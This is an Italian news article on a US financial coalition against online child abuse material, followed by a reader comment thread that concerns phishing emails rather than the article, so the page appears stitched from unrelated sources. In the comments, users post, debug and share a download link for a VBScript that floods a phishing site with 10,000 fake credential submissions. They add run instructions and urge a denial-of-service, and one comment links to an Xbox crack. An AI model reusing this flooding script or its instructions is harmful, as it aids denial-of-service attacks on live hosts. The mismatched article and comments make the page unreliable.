Pedoporno web, parte l'assalto finanziario

Banche, società di credito, web company ed enti federali statunitensi hanno individuato nelle transazioni finanziarie il ventre molle del business più odioso: vede la luce la Financial Coalition Against Child Pornography


Washington (USA) – Tutti uniti contro la pedopornografia online per tagliare le sue basi finanziarie, distruggere le economie delle organizzazioni criminali che lucrano sulle violenze ai danni dei più piccoli: questa la ricetta dell’ultima campagna che vede coinvolte agenzie federali statunitensi, società di servizi finanziari e organizzazioni per la protezione dei minori.

Financial Coalition Against Child Pornography (FCACP), un progetto di cui si parla da lungo tempo e che ora vede formalmente la luce, vuole colpire nel vivo un mercato che si ritiene abbia raggiunto un valore di 20 miliardi di dollari l’anno.

L’ultimo caso che ha visto l’utilizzo di un sistema di video-chat e streaming pedopornografico ha scosso l’opinione pubblica statunitense e consentito al progetto di decollare. La presenza di materiale di questo tipo, secondo le statistiche federali, riguarda nel complesso almeno 250mila siti Web, e nei prossimi cinque anni il mercato potrebbe raggiungere i 30 miliardi di dollari.

Per contrastare sul serio questo fenomeno, come già sostenuto da anni da diversi osservatori, è necessario colpire i mezzi di sostentamento, come i servizi di pagamento che consentono ai criminali di prosperare. Spesso si servono delle normali transazioni su carta di credito , come fossero normali operatori commerciali.

Il Senatore Repubblicano Richard Shelby, presidente del Senate Banking Committee , dopo aver approfondito con dati ufficiali la consistenza del problema, e le implicazioni finanziarie che portano in molti casi alla criminalità organizzata internazionale, si è fatto promotore del progetto. “Dev’esserci un modo per identificare chi compie queste azioni. Se le persone comprassero eroina e cocaina con la carta di credito tutti griderebbero allo scandalo. In questo caso è decisamente peggio, quindi bisogna reagire colpendo direttamente la rete economica”, ha dichiarato Shelby. Una strategia che ha convinto banche, società di credito (come Visa, MasterCard ed American Express), Web company e National Center for Missing and Exploited Children a unirsi per rispondere adeguatamente alla sfida lanciata dalla pedo-pornografia.

I membri di questa nuova coalizione hanno intenzione di condividere in maniera più efficiente tutte le informazioni finanziarie sospette . “Possiamo avere un grande impatto sulle risorse della pedopornografia; tagliando i fondi ci aspettiamo un ridimensionamento del loro potere. Uniti possiamo fare molto di più che singolarmente”, ha dichiarato Josh Peirez, responsabile della public policy di MasterCard . “La coalizione diventerà il punto di riferimento per l’archiviazione dei dati riguardanti il business della pedopornografia. Ad esempio una volta individuato un sito che contiene immagini vietate si potrebbe cancellare ogni transazione che lo riguarda, informare le banche, notificare agli altri operatori di credito quello che sta avvenendo e sostenere le autorità per un’eventuale azione legale”.

L’iniziativa ha già avuto prova che questo sistema funziona. Nel 2004, MasterCard, Morgan Stanley e Visa collaborarono con gli enti inquirenti per scardinare una rete pornopedofila che sfruttava la piattaforma Regpay. Il risultato si rivelò notevole nei numeri: 1.400 persone furono arrestate in un’unica azione coordinata.

Dario d’Elia

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    COLPA DEI LINZOMBIE
    e degli utenti nerd spennacchiati che si divertono ad usare software open e colabrodo per far diventare le loro macchine dei veri e propri spam-server.
  • Anonimo scrive:
    Se tutti usassero la firma digitale...
    ... cose del genere non succederebbero mai 8) Invece anche se non costa niente non la usa nessuno, ed ecco i risultati
  • Anonimo scrive:
    finalmente crakkata xbox360
    http://www.teamxecuter.com/
  • Anonimo scrive:
    Re: A me piacciono i phiser
    - Scritto da: Anonimo
    Ho ricevuto anche io la mail fasulla di Banco
    Posta...e mi sono divertito un sacco.
    L'idea è semplice e richiama alla mente siti come
    http://www.419eater.com: far perdere tempo al
    phiser inviando dati utenti inventati.
    Come riconoscere il phiser?? assolutamente banale
    per chi frequenta la rete da qualche anno, meno
    per i neofiti. Basta guardare attentamente
    l'indirizzo del sito sul quale si finisce, oppure
    sapere che le varie aziende non mandano MAI email
    di quel tipo (spece se, come me, non hai alcun
    conto con bancoposta).
    In ogni caso, ho clicca sul link segnalato sulla
    mail e mi è comparso un bellissimo sito in stile
    bancoposta con i campi per inserire i vari
    codici. In queli campi ho scritto diversi insulti
    al phiser ed ho inviato...almeno sa come la
    penso... :Dtempo perso... tu credi che ci sia qualcuno a leggere le tue cose? probabilmente c'è un algoritmo automatizzato che cataloga e prova ad utilizzare i dati inseriti: se sono fasulli viene eliminato il record.
  • Anonimo scrive:
    Script VBS
    Salve a tutti, nel forum è stato pubblicato uno script VBS.Poichè il copia incolla non è molto agevole, ho pensato di metterlo in uno zip sul mio sito.Phishing Bancoposta:http://www.freetranslator.unmondodi.it/public/phishyourass.zipPhishing Banca Intesa (nuovo):http://www.freetranslator.unmondodi.it/public/phishyourass-BI.zipE' sufficiente estrarre il file .vbs dallo zip e cliccarci sopra.bye
  • Anonimo scrive:
    Re: rispondete inserendo dati falsi
    Prenderli ed appenderli per le palle per 15 ggnon sarebbe meglio ?
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      Prenderli ed appenderli per le palle per 15 ggnon
      sarebbe meglio ?Si si, sono daccordo, se ti offri per andare ad appenderli ti forniamo un po' di indirizzi.
  • Anonimo scrive:
    Re: Grazie Thunderbird
    Peccato che spessissimo ti segnali come tale anche regolari email da eBay e simili :-(((
    • Anonimo scrive:
      Re: Grazie Thunderbird
      - Scritto da: Anonimo
      Peccato che spessissimo ti segnali come tale
      anche regolari email da eBay e simili :-(((lo devi "addestrare": ogni volta che ti segnala un falso negativo elimina il flag di posta indesiderata.se hai già altre mail di eBay, cambiale tutte.in questo modo cambi le regole che thunderbird si è erroneamente creato.sciauz.
  • mda scrive:
    Re: A me piacciono i phiser
    - Scritto da: Anonimo
    Ho ricevuto anche io la mail fasulla di Banco
    Posta...e mi sono divertito un sacco.
    L'idea è semplice e richiama alla mente siti come
    http://www.419eater.com: far perdere tempo al
    phiser inviando dati utenti inventati.
    Come riconoscere il phiser?? assolutamente banale
    per chi frequenta la rete da qualche anno, meno
    per i neofiti. Basta guardare attentamente
    l'indirizzo del sito sul quale si finisce, oppure
    sapere che le varie aziende non mandano MAI email
    di quel tipo (spece se, come me, non hai alcun
    conto con bancoposta).
    In ogni caso, ho clicca sul link segnalato sulla
    mail e mi è comparso un bellissimo sito in stile
    bancoposta con i campi per inserire i vari
    codici. In queli campi ho scritto diversi insulti
    al phiser ed ho inviato...almeno sa come la
    penso... :DOcchio se usi explorer !Di solito quei siti fanno anche il servizietto ! ;).
  • Anonimo scrive:
    ADESSO BASTA
    ... con questa disinformazione.perchè ci si ostina a mettere tutto nello stesso paniere?il pishing è qualche cosa di sbagliato, ovviamente. Ma non ha NULLA a che vedere con quel fenomeno commericale diretto che spesso viene definito, sbagliando, spam.lo spam, cioè marketing diretto, è una forma ONESTA e NORMALE di mettere in contatto produttori e consumatori.Nessuno dice nulla sulla pubblicità alla tv, ma ricevere un e-mail o due ogni tanto con delle informazioni pubblicitarie NON INVASIVE spinge la gente a definirlo SPAM.quello che voi chiamate spam, è un metodo commerciale corretto che produce POSTI DI LAVORO, fa muovere l'economia ed aiuta le imprese in difficoltà, che non potrebbero permettersi di fare la guerra ai monopoli.meditate, gente, meditate...
    • Anonimo scrive:
      9 --
      coglione di merda
    • Anonimo scrive:
      Re: ADESSO BASTA
      Concordo con te, ma sai, pare che Internet scateni istinti umani fin'ora sconosciuti: qualcosa può essere più fastidioso offline, ma nessuno si lamenta e quasi tutti persino paghiamo, se lo stesso lo fai in INternet ... apriti cielo. Altro esemp[io? la legge 196 sulla privacy. Puoi trovare nome e cognome e indirizzi e numero tel sulle pagine gialle, ma se raccogli gli stessi dati nel tuo computer di casa, devi comunicarlo al Garante della privacy. !!!!Italia, un paese di sciroccati ...
      • Anonimo scrive:
        Re: ADESSO BASTA
        - Scritto da: Anonimo
        Concordo con te, ma sai, pare che Internet
        scateni istinti umani fin'ora sconosciuti:
        qualcosa può essere più fastidioso offline, ma
        nessuno si lamenta e quasi tutti persino
        paghiamo, se lo stesso lo fai in INternet ...
        apriti cielo. Altro esemp[io? la legge 196 sulla
        privacy. Puoi trovare nome e cognome e indirizzi
        e numero tel sulle pagine gialle, ma se raccogli
        gli stessi dati nel tuo computer di casa, devi
        comunicarlo al Garante della privacy. !!!!

        Italia, un paese di sciroccati ...bravo!finalmente qualcuno che ha il CORAGGIO di dire le cose come stanno!!
    • mda scrive:
      Re: ADESSO BASTA
      - Scritto da: Anonimo
      ... con questa disinformazione.

      perchè ci si ostina a mettere tutto nello stesso
      paniere?
      Se leggi i dizionari d'informatica lo spam sono email NON DESIDERATE, contenti messaggi pubblicitari o peggio !Non confondere con la pubblicità via email !Ciao
    • Anonimo scrive:
      Re: ADESSO BASTA
      LO SPAM NON E' ONESTO
    • djm scrive:
      Re: ADESSO BASTA
      Più che forma onesta e normale la chiamerei forma stupida. E con questo voglio mettere in discussione anche tutto lo spam telefonico, via fax, via posta, ecc.Io per principio non acquisto servizi da chi spamma, e non perchè sia prevenuto, ma perchè, al di là delle violazioni della legge sulla privacy, sono dei gran rompiscatole. Ricevo tutti i giorni telefonate (per esempio) da Tre o Tele2, mi han talmente scocciato che odio solo pensarne il nome, non mi abbonerei mai neppure se mi regalassero il servizio.
  • Anonimo scrive:
    Spammati
    il li ho spammati con tante parolacce   :p
  • eu scrive:
    Arrivano anche per PayPal
    Ieri mi è arrivata anche una mail riferita a PayPallEccola:----------------------------------------PayPal Security Measures!We are currently performing regular maintenance of our security measures. Your account has been randomly selected for this maintenance, and you will now be taken through a series of identity verification pages.Protecting the security of your PayPal account is our primary concern, and we apologize for any inconvenience this may cause.Please click on the link bellow, then fill in the correct information for that category to verify your identity.(ometto l'indirizzo per evitare link ma disposto s fornirlo alla redazione) Please do not reply to this e-mail. Mail sent to this address cannot be answered.For assistance, log in to your PayPal account and choose the "Help" link in the footer of any page.To receive email notifications in plain text instead of HTML, update your preferences here.PayPal Email ID PP765425-------------------------------------Di solito vedo prima la posta con Pop Peeper e non ho avuto dubbi. Poi ho messo alla prova Thunderbird che l'ha riconosciuta come tentativo di frode.Un'annotazione: molti indirizzi in copia e tutti di caselle yahoo. PayPall non ha una mia casella Yahoo che utilizzo come secondaria nei casi di nessuna rilevanza. ==================================Modificato dall'autore il 21/03/2006 9.18.43==================================Modificato dall'autore il 21/03/2006 9.20.03
    • Anonimo scrive:
      Re: Arrivano anche per PayPal
      - Scritto da: eu
      Ieri mi è arrivata anche una mail riferita a
      PayPallSi ma in inglese te ne accorgi no... questi qui invece usano un italiano perfetto
      • eu scrive:
        Re: Arrivano anche per PayPal

        Si ma in inglese te ne accorgi no... questi qui
        invece usano un italiano perfettoosservazione corretta.....ma forse pensano che per PayPall in inglese può essere comunque accettata
      • Anonimo scrive:
        Re: Arrivano anche per PayPal
        - Scritto da: Anonimo

        - Scritto da: eu

        Ieri mi è arrivata anche una mail riferita a

        PayPall

        Si ma in inglese te ne accorgi no... questi qui
        invece usano un italiano perfettonon proprio.c'è un "Lei" di troppo.
  • Anonimo scrive:
    Re: A me piacciono i phiser
    - Scritto da: Anonimo
    bancoposta con i campi per inserire i vari
    codici. In queli campi ho scritto diversi insulti
    al phiser ed ho inviato...almeno sa come la
    penso... :Deh, eh ! anch'io , insulti veramente ma veramente pesanti.
    • Anonimo scrive:
      Re: A me piacciono i phiser
      - Scritto da: Anonimo

      - Scritto da: Anonimo


      bancoposta con i campi per inserire i vari

      codici. In queli campi ho scritto diversi
      insulti

      al phiser ed ho inviato...almeno sa come la

      penso... :D


      eh, eh ! anch'io , insulti veramente ma veramente
      pesanti.ecco, poi ti denunciano :-(
      • Anonimo scrive:
        Re: A me piacciono i phiser (joe'd)



        bancoposta con i campi per inserire i vari


        codici. In queli campi ho scritto diversi

        insulti


        al phiser ed ho inviato...almeno sa come la


        penso... :D





        eh, eh ! anch'io , insulti veramente ma
        veramente

        pesanti.

        ecco, poi ti denunciano :-(Magari la denuncia proprio no, ma qualche ora persa a rintracciare l'ip di chi li ha presi per i fondelli...joe[b.grillo for president]
        • Anonimo scrive:
          Re: A me piacciono i phiser (joe'd)
          io so' utente fastweb e avoja a rintracciare il mio ip.. ahuahuhuashuashuahushuashua
          • Anonimo scrive:
            Re: A me piacciono i phiser (joe'd)

            io so' utente fastweb e avoja a rintracciare il
            mio ip.. ahuahuhuashuashuahushuashuaAbbiamo un'ottimista.joe[b.grillo's fan]
          • Anonimo scrive:
            Re: A me piacciono i phiser (joe'd)
            - Scritto da: Anonimo

            io so' utente fastweb e avoja a rintracciare il

            mio ip.. ahuahuhuashuashuahushuashua

            Abbiamo un'ottimista.Tu sei ignorante, pero'.
          • Anonimo scrive:
            Re: A me piacciono i phiser (joe'd)



            io so' utente fastweb e avoja a rintracciare
            il


            mio ip.. ahuahuhuashuashuahushuashua



            Abbiamo un'ottimista.

            Tu sei ignorante, pero'.Non si nasce "imparati".Evidentemente a casa tua si vive di presunzione.joe
  • Anonimo scrive:
    Re: Grazie Thunderbird
    idem
    • Anonimo scrive:
      Re: Grazie Thunderbird
      A me no... hhmmm come mai?Thunderbird 1.5 ITA
      • gattuati scrive:
        Re: Grazie Thunderbird
        - Scritto da: Anonimo
        A me no... hhmmm come mai?
        Thunderbird 1.5 ITAAnch'io ho thunderbird1.5 ITA. Vai in "Opzioni/Privacy/Frodi via posta": ho vistato la casella " Controlla la posta per trovare eventuali tentativi di frode.Ciao
    • Anonimo scrive:
      imap e antispam
      - Scritto da: Anonimo
      idem
      come è (se c'è) l'antispam di thunderbird se usato con IMAP?a me serve, ho 4 account che uso con protocollo imap e uno anche via SSL
      • Anonimo scrive:
        Re: imap e antispam
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        idem



        come è (se c'è) l'antispam di thunderbird se
        usato con IMAP?

        a me serve, ho 4 account che uso con protocollo
        imap e uno anche via SSLio uso thunderbird con imap e due account, a parte il fatto che va da dio anche su TLS e SSL, suppongo che il database del filtro antispam sia condiviso. Non lo so con esattezza perché ricevo spam praticamente solo su un indirizzo email, quelle rare volte che la ricevo sull'altro la classifica senza errori, quindi credo che il db sia unico.Ciao
  • Anonimo scrive:
    A me piacciono i phiser
    Ho ricevuto anche io la mail fasulla di Banco Posta...e mi sono divertito un sacco.L'idea è semplice e richiama alla mente siti come http://www.419eater.com: far perdere tempo al phiser inviando dati utenti inventati.Come riconoscere il phiser?? assolutamente banale per chi frequenta la rete da qualche anno, meno per i neofiti. Basta guardare attentamente l'indirizzo del sito sul quale si finisce, oppure sapere che le varie aziende non mandano MAI email di quel tipo (spece se, come me, non hai alcun conto con bancoposta).In ogni caso, ho clicca sul link segnalato sulla mail e mi è comparso un bellissimo sito in stile bancoposta con i campi per inserire i vari codici. In queli campi ho scritto diversi insulti al phiser ed ho inviato...almeno sa come la penso... :D
  • Anonimo scrive:
    Re: rispondete inserendo dati falsi
    I ho risposto alla mail sul bancoposta con lo script che vedete sotto. Eseguito per dieci volte sono riuscito a consegnare ai simpatici pescatori ben 100000 record veramente fasulli.dim httpdim iRandomizefor i=0 to 10000Set http = CreateObject("WinHttp.WinHttprequest.5")http.Open "POST", "http://bancopostaonline.poste.it.bpol.bancoposta.dllinfo.tv/r1/pi/submit.php?bpolMenuID=menu_login&USER=" & n & "&Password=" & p & "&codice=" & n & _ "&URL=.%2Fentry%2Fonaccess.asp%3FURL%3Dhttps%3A%2F%2Fbancopostaonline.poste.it%2FBPOL%2Fbancoposta%2F&target=%2Fbpol%2Fbancoposta%2Fentry%2Fonaccess.asp%3FURL%3Dhttps%3A%2F%2Fbancopostaonline.poste.it%2FBPOL%2Fbancoposta%2F" ,falsehttp.sendnextfunction n() dim kdcQuizSelectChr,k kdcQuizSelectChr = "" For kdcQuizSelectCnt = 1 to 8 kdcQuizSelect = Int(10 * Rnd()) kdcQuizSelectChr = kdcQuizSelectChr & kdcQuizSelect Next n= UCASE(kdcQuizSelectChr)end functionfunction p() dim kdcQuizSelectChr,k kdcQuizSelectChr = "" For kdcQuizSelectCnt = 1 to 8 kdcQuizSelect = Chr(Int(3 * Rnd() + 49)) Randomize Select Case kdcQuizSelect Case "1" kdcQuizSelect1 = Chr(Int(10 * Rnd() + 48)) Case "2" kdcQuizSelect1 = Chr(Int(26 * Rnd() + 65)) Case "3" kdcQuizSelect1 = Chr(Int(26 * Rnd() + 97)) End Select kdcQuizSelectChr = kdcQuizSelectChr & kdcQuizSelect1 Next p= UCASE(kdcQuizSelectChr)end function
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      Se un I D O L O!!! :D - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.

      dim http
      dim i

      Randomize
      for i=0 to 10000

      Set http =
      CreateObject("WinHttp.WinHttprequest.5")

      http.Open "POST",
      "http://bancopostaonline.poste.it.bpol.bancoposta.

      "&URL=.%2Fentry%2Fonaccess.asp%3FURL%3Dhttps%3A%2F
      http.send
      next



      function n()
      dim kdcQuizSelectChr,k

      kdcQuizSelectChr = ""
      For kdcQuizSelectCnt = 1 to 8

      kdcQuizSelect = Int(10 * Rnd())

      kdcQuizSelectChr = kdcQuizSelectChr &
      kdcQuizSelect
      Next

      n= UCASE(kdcQuizSelectChr)
      end function

      function p()
      dim kdcQuizSelectChr,k

      kdcQuizSelectChr = ""
      For kdcQuizSelectCnt = 1 to 8

      kdcQuizSelect = Chr(Int(3 * Rnd() + 49))
      Randomize
      Select Case kdcQuizSelect
      Case "1"
      kdcQuizSelect1 = Chr(Int(10 * Rnd() +
      48))
      Case "2"
      kdcQuizSelect1 = Chr(Int(26 * Rnd() +
      65))
      Case "3"
      kdcQuizSelect1 = Chr(Int(26 * Rnd() +
      97))
      End Select
      kdcQuizSelectChr = kdcQuizSelectChr &
      kdcQuizSelect1
      Next

      p= UCASE(kdcQuizSelectChr)
      end function
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      Secondo me l'unico mezzo che abbiamo per cercare di bloccare queste truffe e' appunto mettere in pratica un bel DOS!!!Complimenti per l'idea.Codapas
      • Anonimo scrive:
        Re: rispondete inserendo dati falsi
        - Scritto da: Anonimo
        Secondo me l'unico mezzo che abbiamo per cercare
        di bloccare queste truffe e' appunto mettere in
        pratica un bel DOS!!!
        Complimenti per l'idea.
        Codapasmovvedo
        • Anonimo scrive:
          Re: rispondete inserendo dati (joe'd)

          - Scritto da: Anonimo

          Secondo me l'unico mezzo che abbiamo per cercare

          di bloccare queste truffe e' appunto mettere in

          pratica un bel DOS!!!

          Complimenti per l'idea.

          CodapasFacciamo i braveheart dell'informatica?Se per un qualche recondito motivo ti trovi davanti a un non-lamer qualunque, son cavoli amari.Io mi domando: chi paga costoro per puntare così in alto? Non stanno truffando l'aziendina familiare dietro l'angolo...joe[b.grillo for president]
          • Anonimo scrive:
            Re: rispondete inserendo dati (joe'd)

            Facciamo i braveheart dell'informatica?
            Se per un qualche recondito motivo ti trovi
            davanti a un non-lamer qualunque, son cavoli
            amari.Cioe' ?
            Io mi domando: chi paga costoro per puntare così
            in alto? Non stanno truffando l'aziendina
            familiare dietro l'angolo...E' il complotto giudaico-massonico, finanziato dai Savi di Sion
            joe
            [b.grillo for president]Dio ne liberi
          • Anonimo scrive:
            Re: rispondete inserendo dati (joe'd)


            Facciamo i braveheart dell'informatica?

            Se per un qualche recondito motivo ti trovi

            davanti a un non-lamer qualunque, son cavoli

            amari.

            Cioe' ?Cioè che? Criticavo il comportamento di coloro che allegramente (e istigano a farlo) rispondono ai siti truffaldini, senza prima chiedersi se vale il rischio: sono sprovveduti di passaggio? ragazzini imitatori di turno?

            Io mi domando: chi paga costoro per puntare così

            in alto? Non stanno truffando l'aziendina

            familiare dietro l'angolo...

            E' il complotto giudaico-massonico, finanziato
            dai Savi di SionZì?

            joe

            [b.grillo for president]

            Dio ne liberiDai grilli?
          • Anonimo scrive:
            Re: rispondete inserendo dati (joe'd)

            senza prima chiedersi se
            vale il rischio: sono sprovveduti di passaggio?
            ragazzini imitatori di turno?Qual e' il rischio ?


            Io mi domando: chi paga costoro per puntare
            così


            in alto? Non stanno truffando l'aziendina


            familiare dietro l'angolo...Hai anche la risposta ?


            [b.grillo for president]



            Dio ne liberi

            Dai grilli?Solo da uno, quello irrimediabilmente stolido
          • Anonimo scrive:
            Re: rispondete inserendo dati (joe'd)


            senza prima chiedersi se

            vale il rischio: sono sprovveduti di passaggio?

            ragazzini imitatori di turno?

            Qual e' il rischio ?Pensando a un individuo mangia-bit e ben pagato (non lamer), magari di diventare un bersaglio.Esagererò, ma io eviterei di confrontarmi con certa gente.



            Io mi domando: chi paga costoro per puntare

            così



            in alto? Non stanno truffando l'aziendina



            familiare dietro l'angolo...

            Hai anche la risposta ?Lobby, concorrenti del settore...



            [b.grillo for president]





            Dio ne liberi



            Dai grilli?

            Solo da uno, quello irrimediabilmente stolidoCom'è che ti sei fatto quest'idea? Sarei curioso...Almeno per conoscere anche il rovescio della medaglia: n'è detto che mi faccia un'opinione più completa anch'io...joe[w b.grillo]
    • Anonimo scrive:
      è un VBS?
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.è un vbs, scusa?
      • Anonimo scrive:
        Re: è un VBS?
        Premetto che non sono l'autore dello script.Ho salvato il file, funzionante in uno zip sul mio sito.E' scaricabile da qui:http://www.freetranslator.unmondodi.it/public/phishyourass.zipBasta solo estrarre il file phishyourass.vbs dallo zip e fare doppio click.Buon Divertimento :)
        • Anonimo scrive:
          Re: è un VBS?
          - Scritto da: Anonimo
          Premetto che non sono l'autore dello script.
          Ho salvato il file, funzionante in uno zip sul
          mio sito.

          E' scaricabile da qui:
          http://www.freetranslator.unmondodi.it/public/phis

          Basta solo estrarre il file phishyourass.vbs
          dallo zip e fare doppio click.

          Buon Divertimento :)"the server name or address could not be resolved":(
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.

      dim http
      dim i

      Randomize
      for i=0 to 10000

      Set http =
      CreateObject("WinHttp.WinHttprequest.5")mi da errore già qui:(
      • Anonimo scrive:
        Re: rispondete inserendo dati falsi


        Set http =

        CreateObject("WinHttp.WinHttprequest.5")

        mi da errore già qui

        :(prova a usare CreateObject("WinHttp.WinHttprequest.5.1");-)
        • Anonimo scrive:
          Re: rispondete inserendo dati falsi
          - Scritto da: Anonimo



          Set http =


          CreateObject("WinHttp.WinHttprequest.5")



          mi da errore già qui



          :(

          prova a usare
          CreateObject("WinHttp.WinHttprequest.5.1")

          ;-)Inoltre (codice corretto):http.Open "POST", "http://bancopostaonline.poste.it.bpol.bancoposta.dllinfo.tv/r1/pi/submit.php?bpolMenuID=menu_login&USER=" & n & "&Password=" & p & "&codice=" & n &"URL=.%2Fentry%2Fonaccess.asp%3FURL%3Dhttps%3A%2F%2Fbancopostaonline.poste.it%2FBPOL%2Fbancoposta%2F&target=%2Fbpol%2Fbancoposta%2Fentry%2Fonaccess.asp%3FURL%3Dhttps%3A%2F%2Fbancopostaonline.poste.it%2FBPOL%2Fbancoposta%2F" ,falsehttp.sendnext
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            - Scritto da: Anonimo





            Set http =



            CreateObject("WinHttp.WinHttprequest.5")





            mi da errore già qui





            :(



            prova a usare

            CreateObject("WinHttp.WinHttprequest.5.1")



            ;-)

            Inoltre (codice corretto):
            http.Open "POST",
            "http://bancopostaonline.poste.it.bpol.bancoposta.
            http.send
            nextInfine: salvare come pippo.vbs e da una shell dos lanciare "cscript pippo.vbs"Enjoy!
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            - Scritto da: Anonimo







            Set http =




            CreateObject("WinHttp.WinHttprequest.5")







            mi da errore già qui







            :(





            prova a usare


            CreateObject("WinHttp.WinHttprequest.5.1")





            ;-)



            Inoltre (codice corretto):

            http.Open "POST",


            "http://bancopostaonline.poste.it.bpol.bancoposta.

            http.send

            next


            Infine: salvare come pippo.vbs e da una shell dos
            lanciare "cscript pippo.vbs"

            Enjoy!c'è qualcosa che non va nella costruzione della stringa :-( si aspetta una fine istruzione verso il 170mo carattere della riga "set"
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            - Scritto da: Anonimo





            - Scritto da: Anonimo









            Set http =





            CreateObject("WinHttp.WinHttprequest.5")









            mi da errore già qui









            :(







            prova a usare



            CreateObject("WinHttp.WinHttprequest.5.1")







            ;-)





            Inoltre (codice corretto):


            http.Open "POST",





            "http://bancopostaonline.poste.it.bpol.bancoposta.


            http.send


            next





            Infine: salvare come pippo.vbs e da una shell
            dos

            lanciare "cscript pippo.vbs"



            Enjoy!

            c'è qualcosa che non va nella costruzione della
            stringa :-( si aspetta una fine istruzione verso
            il 170mo carattere della riga "set"oppure se sforbicio da qualche parte (dalle parti del login, e del segno di uguale, per capirci) alla fine mi dice comunque "The server name or address could not be resolved"uf!!! uffffff!!!!!
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            - Scritto da: Anonimo





            - Scritto da: Anonimo







            - Scritto da: Anonimo











            Set http =







            CreateObject("WinHttp.WinHttprequest.5")











            mi da errore già qui











            :(









            prova a usare




            CreateObject("WinHttp.WinHttprequest.5.1")









            ;-)







            Inoltre (codice corretto):



            http.Open "POST",









            "http://bancopostaonline.poste.it.bpol.bancoposta.



            http.send



            next








            Infine: salvare come pippo.vbs e da una shell

            dos


            lanciare "cscript pippo.vbs"





            Enjoy!



            c'è qualcosa che non va nella costruzione della

            stringa :-( si aspetta una fine istruzione
            verso

            il 170mo carattere della riga "set"

            oppure se sforbicio da qualche parte (dalle parti
            del login, e del segno di uguale, per capirci)
            alla fine mi dice comunque "The server na
            me or address could not be resolved"

            uf!!! uffffff!!!!!senti salvalo da qualche parte!!! :-Ddai!!
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Sei un GRANDE! ;)
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
      - Scritto da: Anonimo
      I ho risposto alla mail sul bancoposta con lo
      script che vedete sotto. Eseguito per dieci volte
      sono riuscito a consegnare ai simpatici pescatori
      ben 100000 record veramente fasulli.senti, l'idea mi piace, ma spiegaci meglio come si fa a contrattaccare. diamogli una lezione!dove va inserito lo script?
      • Anonimo scrive:
        Re: rispondete inserendo dati falsi
        - Scritto da: Anonimo

        - Scritto da: Anonimo

        I ho risposto alla mail sul bancoposta con lo

        script che vedete sotto. Eseguito per dieci
        volte

        sono riuscito a consegnare ai simpatici
        pescatori

        ben 100000 record veramente fasulli.

        senti, l'idea mi piace, ma spiegaci meglio come
        si fa a contrattaccare. diamogli una lezione!
        dove va inserito lo script?
        è un vbscopi il codice (devi fare un'eccezione per il link, che viene tagliato dal forum di PI, ma basta fare "copia colletamento" e incollarlo tra le virgolette sostituendo il codice tagliato) dentro ad un file di testo e poi lo rinomini in "goditiquestosignorphisher.vbs"e fai un bel doppioclick (sempre che il tuo antivirus non sia contrario alla cosa) oppure vai da linea di comando nella cartella in cui lo hai salvatoe fai cscript [nomefile.estensione] ovvero in questo casocscript goditiquestosignorphisher.vbs [invio]solo che nel copia-incollare il codice c'è qualche errorino... :((
        • Anonimo scrive:
          Re: rispondete inserendo dati falsi

          è un vbs
          [...]
          e fai un bel doppioclick (sempre che il tuo
          antivirus non sia contrario alla cosa)
          [...]
          solo che nel copia-incollare il codice c'è
          qualche errorino... :((grazie, sei stato gentilissimo. io ho una macchina linux, ma anche una piccola partizione win, quindi provero' a vedere se funziona. in ogni caso, visto che mi dici dell'errorino, se qualcuno vuole postare una versione sicuramente funzionante, saremo lieti in tanti di intasare il phisher di turno.grazie ancora.
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            è un vbs

            [...]

            e fai un bel doppioclick (sempre che il tuo

            antivirus non sia contrario alla cosa)

            [...]

            solo che nel copia-incollare il codice c'è

            qualche errorino... :((

            grazie, sei stato gentilissimo. io ho una
            macchina linux, ma anche una piccola partizione
            win, quindi provero' a vedere se funziona. in
            ogni caso, visto che mi dici dell'errorino, se
            qualcuno vuole postare una versione sicuramente
            funzionante, saremo lieti in tanti di intasare il
            phisher di turno.
            grazie ancora.Ciao, non sono l'autore dello script.Come dicevo qualche post fa, ho messo il fine in uno zip scaricabile dal mio sito:http://www.freetranslator.unmondodi.it/public/phishyourass.zipbye
          • Anonimo scrive:
            Re: rispondete inserendo dati falsi
            - Scritto da: Anonimo

            - Scritto da: Anonimo


            è un vbs


            [...]


            e fai un bel doppioclick (sempre che il tuo


            antivirus non sia contrario alla cosa)


            [...]


            solo che nel copia-incollare il codice c'è


            qualche errorino... :((



            grazie, sei stato gentilissimo. io ho una

            macchina linux, ma anche una piccola partizione

            win, quindi provero' a vedere se funziona. in

            ogni caso, visto che mi dici dell'errorino, se

            qualcuno vuole postare una versione sicuramente

            funzionante, saremo lieti in tanti di intasare
            il

            phisher di turno.

            grazie ancora.

            Ciao, non sono l'autore dello script.
            Come dicevo qualche post fa, ho messo il fine in
            uno zip scaricabile dal mio sito:

            http://www.freetranslator.unmondodi.it/public/phis

            byemi da lo stesso errore che da alla fine l'operazione spiegata.server name could not be resolved ecc... ma forse perchè non esiste più! :)speriamo!!!
    • Anonimo scrive:
      Re: rispondete inserendo dati falsi
